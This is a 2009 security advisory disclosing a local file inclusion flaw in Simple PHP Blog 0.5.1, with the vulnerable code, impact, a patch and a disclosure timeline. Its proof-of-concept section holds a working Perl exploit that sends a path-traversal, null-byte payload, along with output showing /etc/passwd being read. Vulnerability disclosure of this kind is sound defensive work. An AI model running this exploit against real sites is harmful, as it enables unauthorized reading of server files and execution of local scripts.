Simple PHP Blog 0.5.1 Local File Inclusion

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2009-005  
- Original release date: March 2nd, 2009  
- Last revised: December 18th, 2009  
- Discovered by: Juan Galiana Lara  
- Severity: 6.8/10 (CVSS scored)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Simple PHP Blog <= 0.5.1 Local File Include vulnerability  
  
II. BACKGROUND  
-------------------------  
Simple PHP Blog is a blog system does not requires database setup, and  
is very easy to install.  
  
III. DESCRIPTION  
-------------------------  
Simple PHP Blog <= 0.5.1 is affected by a Local File Include  
vulnerability in 'languages_cgi.php' due to parameter 'blog_language1'  
is not properly sanitized.  
  
IV. PROOF OF CONCEPT  
-------------------------  
The affected code:  
  
62 require_once('languages/' . $_POST[ 'blog_language1' ] .  
'/strings.php');  
  
Exploit:  
  
#!/usr/bin/perl  
# Local File Include Exploit  
# Simple PHP Blog <= 0.5.1  
# jgaliana <at> isecauditors=dot=com  
# Internet Security Auditors  
  
use LWP::UserAgent;  
  
if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }  
$ua = LWP::UserAgent->new;  
$ua->agent("Simple PHP Blog Exploit ^_^");  
$ua->default_header('Cookie' => "sid=$ARGV[3]");  
my $req = new HTTP::Request POST =>  
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";  
$req->content_type('application/x-www-form-urlencoded');  
$req->content("blog_language1=../../../../..$ARGV[2]%00");  
my $res = $ua->request($req);  
  
if ($res->is_success) {  
print $res->content;  
} else {  
print "Error: " .$res->status_line, "\n";  
}  
  
$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1  
root:*:0:0:root:/root:/bin/bash  
  
The bug can be exploited with or without 'magic_quotes_gpc', but note  
that if magic_quotes_gpc is set to Off, an attacker can view any file,  
adding a '\0' character like /etc/passwd, if not only can include php  
files, allowing to execute any local php files.  
  
V. BUSINESS IMPACT  
-------------------------  
The impact is the attacker can read arbitrary files in the context of  
the webserver and execute arbitrary local php scripts.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Versions prior and including 0.5.1 are affected  
In order to patch the application the function file_exists() and  
basename() must be added to the affected code.  
  
VII. SOLUTION  
-------------------------  
Change line 62 of languages_cgi.php in order to filter $_POST[  
'blog_language1' ] variable.  
  
if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))  
require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');  
  
VIII. REFERENCES  
-------------------------  
http://www.simplephpblog.com  
http://sourceforge.net/projects/sphpblog/  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
March 02, 2009: Initial release.  
December 18, 2009: Last revision.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
March 02, 2009: Vulnerability acquired by  
Internet Security Auditors (www.isecauditors.com)  
March 03, 2009: Notified to developer. No response.  
December 13, 2009: Notified again. No response.  
December 18, 2009: Added mitigation solution and sent to lists.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`